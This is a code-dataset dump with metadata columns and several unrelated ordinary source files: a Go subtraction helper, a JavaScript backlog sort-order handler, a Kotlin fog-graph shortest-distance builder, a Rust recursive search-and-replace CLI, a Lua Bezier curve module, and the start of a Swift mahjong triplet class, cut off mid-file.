hexsha
stringlengths 40
40
| size
int64 140
1.03M
| ext
stringclasses 94
values | lang
stringclasses 21
values | max_stars_repo_path
stringlengths 3
663
| max_stars_repo_name
stringlengths 4
120
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
663
| max_issues_repo_name
stringlengths 4
120
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
663
| max_forks_repo_name
stringlengths 4
135
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 140
1.03M
| avg_line_length
float64 2.32
23.1k
| max_line_length
int64 11
938k
| alphanum_fraction
float64 0.01
1
| score
float32 3
4.25
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a169a0c436e5ece742a17c7ea2ade0d5e3df729c | 1,546 | go | Go | math/subtract.go | buro9/funcs | 0a117fc83732c13b554d10e52d17997b113a3d2c | [
"MIT"
] | null | null | null | math/subtract.go | buro9/funcs | 0a117fc83732c13b554d10e52d17997b113a3d2c | [
"MIT"
] | null | null | null | math/subtract.go | buro9/funcs | 0a117fc83732c13b554d10e52d17997b113a3d2c | [
"MIT"
] | null | null | null | package math
// Subtract takes two numbers (a and b) and subtracts b from a.
//
// The type of b will be cast to the same type as a, so the result always has
// the dynamic type of a. Casting a float into an integer type truncates the
// fractional part.
//
// Supported types for both arguments are float32, float64, int, int32 and
// int64; any other combination returns nil.
func Subtract(a interface{}, b interface{}) interface{} {
	switch av := a.(type) {
	case float32:
		// Result is float32; b is converted before subtracting.
		switch bv := b.(type) {
		case float32:
			return av - bv
		case float64:
			return av - float32(bv)
		case int:
			return av - float32(bv)
		case int32:
			return av - float32(bv)
		case int64:
			return av - float32(bv)
		default:
			return nil
		}
	case float64:
		// Result is float64.
		switch bv := b.(type) {
		case float32:
			return av - float64(bv)
		case float64:
			return av - bv
		case int:
			return av - float64(bv)
		case int32:
			return av - float64(bv)
		case int64:
			return av - float64(bv)
		default:
			return nil
		}
	case int:
		// Result is int; float values of b are truncated.
		switch bv := b.(type) {
		case float32:
			return av - int(bv)
		case float64:
			return av - int(bv)
		case int:
			return av - bv
		case int32:
			return av - int(bv)
		case int64:
			return av - int(bv)
		default:
			return nil
		}
	case int32:
		// Result is int32; float values of b are truncated.
		switch bv := b.(type) {
		case float32:
			return av - int32(bv)
		case float64:
			return av - int32(bv)
		case int:
			return av - int32(bv)
		case int32:
			return av - bv
		case int64:
			return av - int32(bv)
		default:
			return nil
		}
	case int64:
		// Result is int64; float values of b are truncated.
		switch bv := b.(type) {
		case float32:
			return av - int64(bv)
		case float64:
			return av - int64(bv)
		case int:
			return av - int64(bv)
		case int32:
			return av - int64(bv)
		case int64:
			return av - bv
		default:
			return nil
		}
	default:
		// Unsupported type for a.
		return nil
	}
}
| 17.770115 | 64 | 0.613842 | 3.015625 |
bccec26a54de7338da918cc2ddbfc5c949498969 | 1,680 | js | JavaScript | server/src/commandHandlers/setSortOrder.js | sthagen/Zuehlke-poinz | c1514c03f4ba22b819eed8de8c5242eba4801067 | [
"MIT"
] | null | null | null | server/src/commandHandlers/setSortOrder.js | sthagen/Zuehlke-poinz | c1514c03f4ba22b819eed8de8c5242eba4801067 | [
"MIT"
] | null | null | null | server/src/commandHandlers/setSortOrder.js | sthagen/Zuehlke-poinz | c1514c03f4ba22b819eed8de8c5242eba4801067 | [
"MIT"
] | null | null | null | /**
* A user re-orders the backlog manually.
* This command will set the new sortOrder of all active stories in the room.
* Trashed stories will not be affected. (sortOrder = undefined).
*/
/**
 * JSON schema for the "setSortOrder" command.
 *
 * The payload must contain exactly one property, "sortOrder": an array of
 * story ids (uuid strings). That the array covers exactly the untrashed
 * stories of the room is checked in the handler's preCondition, not here.
 */
const schema = {
  allOf: [
    {
      $ref: 'command'
    },
    {
      properties: {
        payload: {
          type: 'object',
          properties: {
            sortOrder: {
              // list of story-ids. Must contain all ids of all untrashed stories in room.
              type: 'array',
              items: {
                type: 'string',
                format: 'uuid'
              }
            }
          },
          required: ['sortOrder'],
          additionalProperties: false
        }
      }
    }
  ]
};
/**
 * Command handler for "setSortOrder".
 *
 * preCondition verifies that the given sortOrder lists exactly the ids of all
 * untrashed stories in the room (no extras, no omissions); fn then emits the
 * "sortOrderSet" event with the validated payload.
 */
const setSortOrderCommandHandler = {
  schema,
  preCondition: (room, command) => {
    const activeStoriesInRoom = room.stories.filter((s) => !s.trashed);
    const sortOrderInCommand = [...new Set(command.payload.sortOrder)]; // remove any duplicates

    if (activeStoriesInRoom.length !== sortOrderInCommand.length) {
      throw new Error(
        `Given sortOrder contains ${sortOrderInCommand.length} storyIds. However, we have ${activeStoriesInRoom.length} (untrashed) stories in our room!`
      );
    }

    // Set lookup gives O(1) membership checks instead of a nested .find()
    // scan (O(n²) for large backlogs).
    const activeStoryIds = new Set(activeStoriesInRoom.map((s) => s.id));
    const allIdsInCommandPresentInRoom = sortOrderInCommand.every((storyId) =>
      activeStoryIds.has(storyId)
    );
    if (!allIdsInCommandPresentInRoom) {
      throw new Error('Given sortOrder contains storyIds that do not match stories in our room!');
    }
  },
  fn: (pushEvent, room, command) => {
    pushEvent('sortOrderSet', command.payload);
  }
};
export default setSortOrderCommandHandler;
| 28.474576 | 153 | 0.597619 | 3.09375 |
e354583b87d12253c7b85983fa3a2a5d42e8df29 | 5,235 | kt | Kotlin | src/main/kotlin/emufog/fog/FogGraphBuilder.kt | emufog/emufog | d79defb13b203ef5bfb45c3396782516ade9338f | [
"MIT"
] | 22 | 2017-09-26T13:12:13.000Z | 2022-01-03T19:29:34.000Z | src/main/kotlin/emufog/fog/FogGraphBuilder.kt | emufog/emufog | d79defb13b203ef5bfb45c3396782516ade9338f | [
"MIT"
] | 49 | 2017-10-24T10:18:37.000Z | 2021-06-12T08:05:48.000Z | src/main/kotlin/emufog/fog/FogGraphBuilder.kt | emufog/emufog | d79defb13b203ef5bfb45c3396782516ade9338f | [
"MIT"
] | 9 | 2017-09-12T20:42:18.000Z | 2021-07-10T12:38:34.000Z | /*
* MIT License
*
* Copyright (c) 2020 emufog contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
package emufog.fog
import emufog.graph.AS
import emufog.graph.Edge
import emufog.graph.EdgeDeviceNode
import emufog.graph.Node
import emufog.util.Heap
import emufog.util.PriorityHeap
/**
 * Runs a shortest-distance calculation for every edge node of the given system that has
 * devices attached. Each [BaseNode] in the result carries a cost mapping from those edge
 * nodes to the respective connection costs; paths whose costs exceed the threshold are
 * not explored further.
 *
 * @param system system to calculate the distances for
 * @param threshold cost function threshold to stop iterating
 * @return a set of all the nodes that are within the threshold
 */
internal fun calculateShortestDistances(system: AS, threshold: Float): Set<BaseNode> =
    FogGraphBuilder(system, threshold).createFogGraph()
/**
 * Cost function for a single edge of the graph. The edge's latency is currently used
 * directly as its cost.
 *
 * @return costs of this edge
 */
private fun Edge.getCosts(): Float = latency
/**
 * Re-inserts the given element into this [Heap] if it is currently contained, refreshing
 * its priority ordering after a cost change. Elements not in the heap are left untouched.
 */
internal fun <T> Heap<T>.update(element: T) {
    val wasPresent = this.remove(element)
    if (wasPresent) {
        this.add(element)
    }
}
private class FogGraphBuilder(private val system: AS, private val threshold: Float) {

    // wrappers for all graph nodes discovered so far, keyed by the underlying node
    private val nodes: MutableMap<Node, BaseNode> = HashMap()

    /**
     * Builds the fog graph for the system: wraps every edge node with attached devices in a
     * [StartingNode], registers it, and runs one Dijkstra pass from each of them.
     *
     * @return all nodes discovered within the cost threshold
     */
    internal fun createFogGraph(): Set<BaseNode> {
        // map edge device nodes to their respective wrappers
        val startingNodes = system.edgeNodes.filter { it.hasDevices() }.map { StartingNode(it) }
        startingNodes.forEach { nodes[it.node] = it }

        startingNodes.forEach { calculateConnectionCosts(it) }

        return nodes.values.toSet()
    }

    /**
     * Calculates the connection costs to all nodes that are within the cost threshold defined in
     * [threshold]. To calculate the costs the function uses the dijkstra algorithm starting
     * from the given node.
     *
     * @param startingNode node to calculate the connection costs for
     */
    private fun calculateConnectionCosts(startingNode: StartingNode) {
        // push the starting node as a starting point in the queue
        startingNode.setCosts(startingNode, 0F)
        val heap = PriorityHeap(CostComparator(startingNode)).also { it.add(startingNode) }

        // using the dijkstra algorithm to iterate the graph
        while (!heap.isEmpty()) {
            val current = heap.pop()
            checkNotNull(current) { "The heap of the Dijkstra Algorithm is empty." }
            val currentCosts = current.getCosts(startingNode)
            checkNotNull(currentCosts) { "No costs associated with this node in the graph." }

            // check all edges leaving the current node; edges crossing AS borders are skipped
            current.node.edges
                .filterNot { it.isCrossASEdge() }
                .forEach { processEdge(it, heap, currentCosts, current, startingNode) }
        }
    }

    /**
     * Relaxation step for a single edge: discovers, or updates the costs of, the neighbor on
     * the far side of [edge] when the path through [current] is cheaper and still within the
     * threshold.
     */
    private fun processEdge(
        edge: Edge,
        heap: Heap<BaseNode>,
        currentCosts: Float,
        current: BaseNode,
        startingNode: StartingNode
    ) {
        val neighbor = edge.getDestinationForSource(current.node)

        // ignore host devices as they are not considered to be possible nodes
        if (neighbor == null || neighbor is EdgeDeviceNode) {
            return
        }

        // abort on costs above the threshold
        val nextCosts = currentCosts + edge.getCosts()
        if (nextCosts > threshold) {
            return
        }

        val neighborNode = nodes.computeIfAbsent(neighbor) { BaseNode(it) }
        val neighborCosts = neighborNode.getCosts(startingNode)
        if (neighborCosts == null) {
            // newly discovered node
            neighborNode.setCosts(startingNode, nextCosts)
            heap.add(neighborNode)
        } else if (nextCosts < neighborCosts) {
            // update an already discovered node
            neighborNode.setCosts(startingNode, nextCosts)
            heap.update(neighborNode)
        }
    }
}
| 38.211679 | 119 | 0.689589 | 3.109375 |
e9b5f638850c1691b66c9e46134fb7620231addc | 16,293 | rs | Rust | src/main.rs | kevin-logan/rsr | 90c60e989e3e369413e89ab241ffae7b3cdd4061 | [
"Apache-2.0"
] | null | null | null | src/main.rs | kevin-logan/rsr | 90c60e989e3e369413e89ab241ffae7b3cdd4061 | [
"Apache-2.0"
] | null | null | null | src/main.rs | kevin-logan/rsr | 90c60e989e3e369413e89ab241ffae7b3cdd4061 | [
"Apache-2.0"
] | null | null | null | macro_rules! info {
( $quiet:expr, $($args:expr),+ ) => {
if !($quiet) {
println!($($args),*);
}
}
}
/// A search/replace rule built from an optional regex and an optional
/// replacement pattern.
struct StringReplacer {
    /// Pattern to match against; `None` means "match everything".
    search_expression: Option<regex::Regex>,
    /// Replacement template (may reference capture groups); `None` disables replacing.
    replace_pattern: Option<String>,
}
impl StringReplacer {
    /// Builds a replacer from an optional search expression and an optional
    /// replacement pattern. A replacement given without a search pattern gets
    /// a match-everything `.*` expression so it can still be applied.
    pub fn new(
        search_expression: Option<regex::Regex>,
        replace_pattern: Option<String>,
    ) -> StringReplacer {
        let (search_expression, replace_pattern) = match (search_expression, replace_pattern) {
            // if no search but there is a replace we'll need a basic search
            (None, Some(replace)) => {
                let catch_all =
                    regex::Regex::new(".*").expect("Failed to compile simple '.*' expression");
                (Some(catch_all), Some(replace))
            }
            other => other,
        };
        StringReplacer {
            search_expression,
            replace_pattern,
        }
    }

    /// True when `text` matches the search expression, or no expression is set.
    pub fn matches(&self, text: &str) -> bool {
        self.search_expression
            .as_ref()
            .map_or(true, |expression| expression.is_match(text))
    }

    /// True when a search expression was configured.
    pub fn has_search(&self) -> bool {
        self.search_expression.is_some()
    }

    /// True when a replacement pattern was configured.
    pub fn has_replace(&self) -> bool {
        self.replace_pattern.is_some()
    }

    /// Applies the replacement to `text`. Without both a search expression and
    /// a replacement pattern the input is returned unchanged (borrowed).
    pub fn do_replace<'t>(&self, text: &'t str) -> std::borrow::Cow<'t, str> {
        match (&self.search_expression, &self.replace_pattern) {
            (Some(search), Some(replace)) => search.replace_all(text, replace.as_str()),
            _ => std::borrow::Cow::from(text),
        }
    }
}
/// One recursive search-and-replace run: filename matching/renaming plus
/// optional in-file text search or replacement.
struct RSRInstance {
    /// Filter/rename rules applied to file names.
    filename_replacer: StringReplacer,
    /// Search/replace rules applied to file contents, line by line.
    text_replacer: StringReplacer,
    /// If true, ask the user to confirm every change (y/N prompt).
    prompt: bool,
    /// If true, suppress informational messages.
    quiet: bool,
}
impl RSRInstance {
    /// Bundles the replacers and user-interaction flags into a runnable instance.
    pub fn new(
        filename_replacer: StringReplacer,
        text_replacer: StringReplacer,
        prompt: bool,
        quiet: bool,
    ) -> RSRInstance {
        RSRInstance {
            filename_replacer,
            text_replacer,
            prompt,
            quiet,
        }
    }

    /// Recursively walks `directory`, handling every regular file found.
    /// Unreadable directories or entries are reported (unless quiet) and skipped.
    pub fn handle_directory(&self, directory: &std::path::Path) {
        match directory.read_dir() {
            Ok(iter) => {
                for entry in iter {
                    if let Ok(entry) = entry {
                        let path = entry.path();
                        if let Ok(file_type) = entry.file_type() {
                            if file_type.is_dir() {
                                self.handle_directory(&path);
                            } else {
                                self.handle_file(&path);
                            }
                        } else {
                            info!(self.quiet, "Ignored {:?}, could not get file type", path);
                        }
                    } else {
                        info!(self.quiet, "Ignoring invalid entry within {:?}", directory);
                    }
                }
            }
            Err(e) => info!(
                self.quiet,
                "Skipping {:?}, error iterating directory: {}", directory, e
            ),
        }
    }

    /// Processes one file: if its name matches the filename filter, run the
    /// content search/replace and (optionally) rename the file itself. When
    /// nothing else was done, the matching filename is printed.
    fn handle_file(&self, file: &std::path::Path) {
        if let Some(filename) = file.file_name() {
            if let Some(filename) = filename.to_str() {
                if self.filename_replacer.matches(&filename) {
                    let mut print_filename = true;

                    if self.text_replacer.has_replace() {
                        print_filename = false; // did something so no need to print filename
                        self.replace_file_contents(&filename, &file);
                    } else if self.text_replacer.has_search() {
                        print_filename = false; // did something so no need to print filename
                        self.search_file_contents(&file);
                    }

                    // do we need to rename?
                    if self.filename_replacer.has_replace() {
                        let new_filename = self.filename_replacer.do_replace(filename);
                        let new_path = file.with_file_name(new_filename.as_ref());

                        if new_path != file {
                            print_filename = false; // did something so no need to print filename
                            if self.confirm(&format!("Rename {:?} => {:?}?", file, new_path)) {
                                if let Err(e) = std::fs::rename(file, &new_path) {
                                    println!(
                                        "Failed to rename {:?} to {:?}: {}!",
                                        file, new_path, e
                                    );
                                };
                            }
                        }
                    }

                    // if we didn't do text search or a rename it's just file match
                    if print_filename {
                        info!(self.quiet, "{}", file.to_string_lossy());
                    }
                }
            } else {
                info!(
                    self.quiet,
                    "Skipping {:?} as the the filename could not be parsed", file
                );
            }
        } else {
            info!(self.quiet, "Skipping {:?} as the it had no filename", file);
        }
    }

    /// Rewrites the contents of `input_path` line by line into a temporary
    /// `<name>.rsr_tmp` sibling, applying the text replacer (with optional
    /// per-line confirmation), then renames the temporary file over the
    /// original, preserving its permissions. Any failure removes the
    /// temporary file and leaves the original untouched.
    fn replace_file_contents(&self, input_filename: &str, input_path: &std::path::Path) {
        let mut read_option = std::fs::OpenOptions::new();
        read_option.read(true);

        if let Ok(input_file) = read_option.open(&input_path) {
            let tmp_file = input_path.with_file_name(input_filename.to_owned() + ".rsr_tmp");
            let mut write_option = std::fs::OpenOptions::new();
            write_option.write(true).create_new(true);

            match write_option.open(&tmp_file) {
                Ok(output_file) => {
                    use std::io::{BufRead, Write};
                    let mut reader = std::io::BufReader::new(input_file);
                    let mut writer = std::io::BufWriter::new(output_file);

                    // BUGFIX: start at 0 so the first line is reported as line 1
                    // (matches search_file_contents; previously started at 1 and
                    // reported every line off by one).
                    let mut line_number = 0;
                    loop {
                        line_number += 1; // starts at zero so increment first
                        let mut line = String::new();
                        match reader.read_line(&mut line) {
                            Ok(count) => {
                                // 0 count indicates we've read everything
                                if count == 0 {
                                    break;
                                }

                                let new_line = self.text_replacer.do_replace(&line);

                                let result = if new_line != line
                                    && self.confirm(&format!(
                                        "{}:{}\n\t{}\n\t=>\n\t{}",
                                        input_path.to_string_lossy(),
                                        line_number,
                                        line.trim(),
                                        new_line.trim()
                                    )) {
                                    writer.write_all(new_line.as_bytes())
                                } else {
                                    writer.write_all(line.as_bytes())
                                };

                                if let Err(e) = result {
                                    // this is actually an error, print regardless of quiet level
                                    println!(
                                        "Skipping {:?} as not all lines could be written to {:?}: {}",
                                        input_path, tmp_file, e
                                    );
                                    std::fs::remove_file(tmp_file).unwrap_or(()); // we don't care if the remove fails
                                    return;
                                }
                            }
                            Err(e) => {
                                // this is actually an error, print regardless of quiet level
                                println!(
                                    "Skipping {:?} as not all lines could be read: {}",
                                    input_path, e
                                );
                                std::fs::remove_file(tmp_file).unwrap_or(()); // we don't care if the remove fails
                                return;
                            }
                        }
                    }

                    // if we got here we've successfully read and written everything, close the files and rename the temp
                    drop(reader);
                    drop(writer);

                    if let Ok(old_metadata) = std::fs::metadata(&input_path) {
                        if let Err(e) =
                            std::fs::set_permissions(&tmp_file, old_metadata.permissions())
                        {
                            println!("Failed to match permissions for {:?}, permissions may have changed: {}", input_path, e);
                        }
                    }

                    if let Err(e) = std::fs::rename(&tmp_file, &input_path) {
                        // this is actually an error, print regardless of quiet level
                        println!(
                            "Failed to rename temporary file {:?} to original file {:?}: {}",
                            tmp_file, input_path, e
                        );
                    }
                }
                Err(e) => {
                    // this is actually an error, print regardless of quiet level
                    println!(
                        "Skipping {:?} as the the temporary file {:?} could not be opened: {}",
                        input_path, tmp_file, e
                    );
                }
            }
        } else {
            info!(
                self.quiet,
                "Skipping {:?} as the the file could not be opened", input_path
            );
        }
    }

    /// Scans `input_path` line by line, printing `path:line  text` (unless
    /// quiet) for every line matching the text search expression.
    fn search_file_contents(&self, input_path: &std::path::Path) {
        let mut read_option = std::fs::OpenOptions::new();
        read_option.read(true);

        if let Ok(input_file) = read_option.open(&input_path) {
            use std::io::BufRead;
            let mut reader = std::io::BufReader::new(input_file);

            let mut line_number = 0;
            loop {
                line_number += 1; // starts at zero so increment first
                let mut line = String::new();
                match reader.read_line(&mut line) {
                    Ok(count) => {
                        // 0 count indicates we've read everything
                        if count == 0 {
                            break;
                        }

                        if self.text_replacer.matches(&line) {
                            info!(
                                self.quiet,
                                "{}:{: <8}{}",
                                input_path.to_string_lossy(),
                                line_number,
                                line.trim()
                            );
                        }
                    }
                    Err(e) => {
                        // this is actually an error, print regardless of quiet level
                        println!(
                            "Skipping {:?} as not all lines could be read: {}",
                            input_path, e
                        );
                        return;
                    }
                }
            }

            // if we got here we've successfully read and written everything, close the files and rename the temp
            drop(reader);
        } else {
            info!(
                self.quiet,
                "Skipping {:?} as the the file could not be opened", input_path
            );
        }
    }

    /// Without `--prompt`, always returns true. With it, prints `message` and
    /// reads one line from stdin: only an exact "y" confirms; anything else
    /// (including a read error) declines.
    fn confirm(&self, message: &str) -> bool {
        match self.prompt {
            true => {
                println!("{} ... Confirm [y/N]: ", message);
                let mut user_response = String::new();
                match std::io::stdin().read_line(&mut user_response) {
                    Ok(_) => user_response.trim() == "y",
                    Err(_) => false,
                }
            }
            false => true,
        }
    }
}
/// Compiles `pattern` into a regex, printing a diagnostic and returning
/// `None` when the expression is invalid (matching the CLI's soft-fail
/// behavior for bad patterns).
fn compile_pattern(pattern: &str) -> Option<regex::Regex> {
    match regex::Regex::new(pattern) {
        Ok(regex) => Some(regex),
        Err(e) => {
            println!("Failed to compile regex {}: {}", pattern, e);
            None
        }
    }
}

/// CLI entry point: parses arguments, builds the filename and text replacers,
/// and walks the target directory.
fn main() {
    let args = clap::App::new("Recursive Search & Replace")
        .version("0.1.0")
        .about("A Recursive Search & Replace program which can find all files matching a pattern and find matches of another pattern in those files and potentially replace those as well")
        .author("Kevin Logan")
        .arg(clap::Arg::with_name("input")
            .short("i")
            .long("input")
            .required(false)
            .help("A regex pattern to filter files which will be included")
            .takes_value(true))
        .arg(clap::Arg::with_name("output")
            .short("o")
            .long("output")
            .required(false)
            .help("A replacement pattern to be applied to <input> (or '.*' if <input> is not provided) to produce the output filename")
            .takes_value(true))
        .arg(clap::Arg::with_name("search")
            .short("s")
            .long("search")
            .required(false)
            .help("A regex pattern for text to search for in the searched files")
            .takes_value(true))
        .arg(clap::Arg::with_name("replace")
            .short("r")
            .long("replace")
            .required(false)
            .help("A replacement pattern to replace any matching text with again <search>. May include references to capture groups, e.g. ${1} or named capture groups like ${name} which would be captured as (?P<name>.*). The curly-brackets are optional but may be required to distinguish between the capture and the rest of the replacement text")
            .takes_value(true))
        .arg(clap::Arg::with_name("prompt")
            .short("p")
            .long("prompt")
            .required(false)
            .help("If set, a y/N prompt will allow the user to decide if each instance of the found text should be replaced. Only relevant if <replace_pattern> is used")
            .takes_value(false))
        .arg(clap::Arg::with_name("quiet")
            .short("q")
            .long("quiet")
            .required(false)
            .help("If set, supresses any messages that are neither required nor errors")
            .takes_value(false))
        .arg(clap::Arg::with_name("dir")
            .required(false)
            .index(1)
            .help("The directory to search for files within"))
        .get_matches();

    // Target directory defaults to the current working directory.
    let dir = match args.value_of("dir") {
        Some(value) => std::path::Path::new(value),
        None => std::path::Path::new("."),
    };

    // Bad patterns compile to None (with a printed diagnostic) rather than
    // aborting, mirroring the previous behavior.
    let input = args.value_of("input").and_then(compile_pattern);
    let output = args.value_of("output").map(String::from);
    let search = args.value_of("search").and_then(compile_pattern);
    let replace = args.value_of("replace").map(String::from);

    let prompt = args.is_present("prompt");
    let quiet = args.is_present("quiet");

    let filename_replace = StringReplacer::new(input, output);
    let text_replace = StringReplacer::new(search, replace);

    let instance = RSRInstance::new(filename_replace, text_replace, prompt, quiet);
    instance.handle_directory(dir);
}
| 39.546117 | 346 | 0.441478 | 3.09375 |
be9c86117e2bee0b2ff8397846e5c55bde8f50a0 | 3,730 | lua | Lua | Data/Scripts/Bezier.lua | Core-Team-META/CC-Cinematic-Shot | 94f66c69c1a9781893de368dc9ced0c70a81544a | [
"Apache-2.0"
] | null | null | null | Data/Scripts/Bezier.lua | Core-Team-META/CC-Cinematic-Shot | 94f66c69c1a9781893de368dc9ced0c70a81544a | [
"Apache-2.0"
] | null | null | null | Data/Scripts/Bezier.lua | Core-Team-META/CC-Cinematic-Shot | 94f66c69c1a9781893de368dc9ced0c70a81544a | [
"Apache-2.0"
] | null | null | null | -- Bezier.lua
-- An instancable class allowing for a curve to be created and drawn in relation to X number of reference points
-- Created by Nicholas Foreman (https://www.coregames.com/user/f9df3457225741c89209f6d484d0eba8)
local BezierPointTemplate = script:GetCustomProperty("BezierPoint")
local BezierSegmentTemplate = script:GetCustomProperty("BezierSegment")
local Module = {}
-- Linear interpolation: the value a fraction t of the way from p0 to p1.
local function lerp(p0, p1, t)
	return p0 + (p1 - p0) * t
end
-- Constructs a new Bezier instance from a folder of reference (control)
-- points and a segment count, then pre-computes the curve positions.
function Module.New(references, numberOfSegments)
	local self = setmetatable({}, {__index = Module})

	self._object = true -- marks this table as an instance (asserted by methods)

	self:Calculate(references, numberOfSegments)

	return self
end
-- Destroys every child object of the given parent.
function Module.ClearChildren(parent)
	local children = parent:GetChildren()
	for index = 1, #children do
		children[index]:Destroy()
	end
end
-- (Re)computes the curve for the given reference points and segment count.
-- Caches both the evenly-sampled ("standard") positions with their distance
-- table and the arc-length-normalized ("percent") positions.
function Module:Calculate(references, numberOfSegments)
	self.numberOfSegments = numberOfSegments
	self.references = references
	self.sum, self.standardPositions, self.sums = self:GetStandardPositions()
	self.percentPositions = self:GetPercentPositions()
end
-- Returns the world positions of all reference point objects, in child order.
function Module:GetReferencesPositions()
	assert(self._object, "Must be an object")

	local positions = {}
	for _, point in ipairs(self.references:GetChildren()) do
		table.insert(positions, point:GetWorldPosition())
	end

	return positions
end
-- Samples the curve at evenly spaced t values and measures each segment's
-- length. Returns three values:
--   sum    total (approximate) curve length,
--   ranges map from accumulated distance -> {segment length, start, end},
--   sums   sorted list of the accumulated-distance keys.
-- NOTE(review): the loop runs to numberOfSegments inclusive, so the last
-- sample uses nextPercent > 1 (extrapolates past the end) — TODO confirm
-- this is intended.
function Module:GetStandardPositions()
	assert(self._object, "Must be an object")

	local referencePositions = self:GetReferencesPositions()
	local sum, ranges, sums = 0, {}, {}

	for number = 0, self.numberOfSegments do
		local percent = (number / self.numberOfSegments)
		local nextPercent = ((number + 1) / self.numberOfSegments)

		local position1 = self:GetPosition(percent, referencePositions)
		local position2 = self:GetPosition(nextPercent, referencePositions)

		local distance = (position2 - position1).size

		ranges[sum] = {distance, position1, position2}
		table.insert(sums, sum)

		sum = sum + distance
	end

	return sum, ranges, sums
end
-- Re-samples the curve so the returned points are evenly spaced by arc
-- length (constant travel distance per step) rather than by parameter t.
function Module:GetPercentPositions()
	assert(self._object, "Must be an object")

	local sum, standardPositions, sums = self.sum, self.standardPositions, self.sums

	local percentPositions = {}
	for number = 0, self.numberOfSegments - 1 do
		local t = number / self.numberOfSegments

		-- Target distance along the curve, then find the last segment that
		-- starts at or before that distance.
		local T, near = t * sum, 0
		for _, n in next, sums do
			if (T - n) < 0 then break end
			near = n
		end

		-- Interpolate linearly within that segment.
		local set = standardPositions[near]
		local percent = (T - near)/set[1]
		table.insert(percentPositions, set[2] + (set[3] - set[2]) * percent)
	end

	return percentPositions
end
-- Evaluates the Bezier curve at the given percent via De Casteljau's
-- algorithm: repeatedly lerps adjacent control points until one remains.
-- BUGFIX: with exactly two control points the reduction yields a single
-- point, which previously fell into the recursive branch and recursed
-- forever (stack overflow); it is now returned directly.
function Module:GetPosition(percent, points)
	assert(self._object, "Must be an object")

	local obtainedPoints = {}

	for index = 1, (#points - 1) do
		local point1, point2 = points[index], points[index + 1]
		table.insert(obtainedPoints, lerp(point1, point2, percent))
	end

	if (#obtainedPoints == 1) then
		-- two control points reduce to a single lerp result
		return obtainedPoints[1]
	elseif (#obtainedPoints == 2) then
		return lerp(obtainedPoints[1], obtainedPoints[2], percent)
	else
		return self:GetPosition(percent, obtainedPoints)
	end
end
-- Spawns a point template at each standard (even-t) sample position under
-- `parent`, naming every point with its normalized distance along the curve.
-- Any previous children of `parent` are destroyed first.
function Module:DrawPoints(parent)
	assert(self._object, "Must be an object")

	Module.ClearChildren(parent)

	-- standardPositions is keyed by accumulated distance; position[2] is the
	-- segment's start position.
	for index, position in pairs(self.standardPositions) do
		local pointToDraw = World.SpawnAsset(BezierPointTemplate, {parent = parent})
		pointToDraw:SetWorldPosition(position[2])
		pointToDraw.name = tostring(CoreMath.Round(index / self.sum, 2))
	end
end
-- Spawns a point template at each arc-length-normalized sample position
-- under `parent`, naming every point with its fraction along the curve.
-- Any previous children of `parent` are destroyed first.
function Module:DrawPointsPercent(parent)
	assert(self._object, "Must be an object")

	Module.ClearChildren(parent)

	for index, position in pairs(self.percentPositions) do
		local pointToDraw = World.SpawnAsset(BezierPointTemplate, {parent = parent})
		pointToDraw:SetWorldPosition(position)
		pointToDraw.name = tostring(index / #self.percentPositions)
	end
end
return Module | 26.834532 | 112 | 0.753083 | 3.265625 |
6d00c97df6457cd670efbf57968faee7f9667864 | 1,822 | swift | Swift | JongHelper/JongHelper/Solver/Mentu/Solver_Kotsu.swift | jphacks/SD_1702 | aaa533930e2d1c3836e80382b3ea51ec90a6b177 | [
"MIT"
] | 13 | 2017-11-01T20:15:18.000Z | 2022-01-15T18:11:33.000Z | JongHelper/JongHelper/Solver/Mentu/Solver_Kotsu.swift | jphacks/SD_1702 | aaa533930e2d1c3836e80382b3ea51ec90a6b177 | [
"MIT"
] | null | null | null | JongHelper/JongHelper/Solver/Mentu/Solver_Kotsu.swift | jphacks/SD_1702 | aaa533930e2d1c3836e80382b3ea51ec90a6b177 | [
"MIT"
] | 6 | 2017-10-27T14:58:02.000Z | 2021-08-11T13:58:41.000Z | //
// Kotu.swift
//
//
// Created by oike toshiyuki on 2017/10/17.
//
import Foundation
// A triplet (kotsu) meld: three identical tiles, open or concealed.
class Kotu: Mentu, Equatable, Comparable {

    var isOpen = false
    var isMentu = false

    // Any one of the three identical tiles identifies the meld.
    var identifierTile: Tile

    init() {
        identifierTile = Tile.null
        isOpen = false
        isMentu = false
    }

    init(isOpen: Bool, identifierTile: Tile) {
        self.identifierTile = identifierTile
        self.isOpen = isOpen
        isMentu = true
    }

    init(isOpen: Bool, tile1: Tile, tile2: Tile, tile3: Tile) {
        self.isOpen = isOpen
